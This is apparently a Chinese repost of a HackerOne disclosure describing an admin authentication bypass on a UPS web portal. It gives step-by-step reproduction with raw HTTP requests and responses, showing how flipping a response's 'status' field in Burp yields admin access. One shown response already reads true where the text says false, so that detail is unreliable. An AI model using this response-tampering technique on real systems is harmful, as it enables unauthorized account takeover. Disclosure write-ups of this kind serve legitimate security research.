UPS公司管理员身份验证绕过导致帐户接管案例

admin 2024年7月9日07:57:57评论15 views字数 2559阅读8分31秒阅读模式
声明:

文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

 

漏洞复现

1、首先访问 https://connectnb.ups.com/Layout/login
2、 输入Admin/1111 登录
3、可以看到用户名、密码错误的提示:

UPS公司管理员身份验证绕过导致帐户接管案例

4、打开Burp,开启拦截抓取登录数据包:

POST /api/Account/Login/ HTTP/2
Host: connectnb.ups.com
Cookie: __RequestVerificationToken=QebkjA4fUWqs_x5SlBpsNQLJfA_U-PO9D27S5PJ8o4WoQ7I7inEZxzHFoQ4huXpUb9jeC8L-JusQF0PU18M73AyQ-xH2jF4hJVYtxbOe5lQ1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 38
Origin: https://connectnb.ups.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"UserName":"admin","Password":"1111"}

5、在 Burp 中拦截请求的响应包,Do Intercept >>Response to this request,放包查看:

HTTP/2 200 OK
Cache-Control: no-cache,no-cache,no-store
Pragma: no-cache,no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: 
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=31536000; includeSubDomains;preload
X-Frame-Options: DENY
X-Ua-Compatible: IE=Edge
Content-Security-Policy: script-src 'self'; object-src 'self'; frame-ancestors 'none'
Expect-Ct: enforce, max-age=7776000, report-uri='https://connectnb.ups.com/'
Access-Control-Allow-Origin: https://connectnb.ups.com/
Access-Control-Allow-Headers: Accept, Content-Type, Origin
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Date: Thu, 24 Feb 2022 03:59:01 GMT
Content-Length: 71

{"status":true,"errorMessage":"Username and Password does not match."}

6、修改 status 的值,将 false 修改为 true,然后放包:

HTTP/2 200 OK
Cache-Control: no-cache,no-cache,no-store
Pragma: no-cache,no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: 
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=31536000; includeSubDomains;preload
X-Frame-Options: DENY
X-Ua-Compatible: IE=Edge
Content-Security-Policy: script-src 'self'; object-src 'self'; frame-ancestors 'none'
Expect-Ct: enforce, max-age=7776000, report-uri='https://connectnb.ups.com/'
Access-Control-Allow-Origin: https://connectnb.ups.com/
Access-Control-Allow-Headers: Accept, Content-Type, Origin
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Date: Thu, 24 Feb 2022 03:59:01 GMT
Content-Length: 71

{"status":true,"errorMessage":"Username and Password does not match."}

7、关闭 Burp 拦截,点击页面右上角的“Report(报告) , Change Password(修改密码)等功能。

UPS公司管理员身份验证绕过导致帐户接管案例

可以看到现在已经拥有了Admin帐户权限,顺利接管管理员帐户。

UPS公司管理员身份验证绕过导致帐户接管案例

以上内容由骨哥翻译并整理。

漏洞披露原文:https://hackerone.com/reports/1490470

原文始发于微信公众号(骨哥说事):【H1最新披露】UPS公司管理员身份验证绕过导致帐户接管案例

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月9日07:57:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   UPS公司管理员身份验证绕过导致帐户接管案例http://cn-sec.com/archives/2932282.html

发表评论

匿名网友 填写信息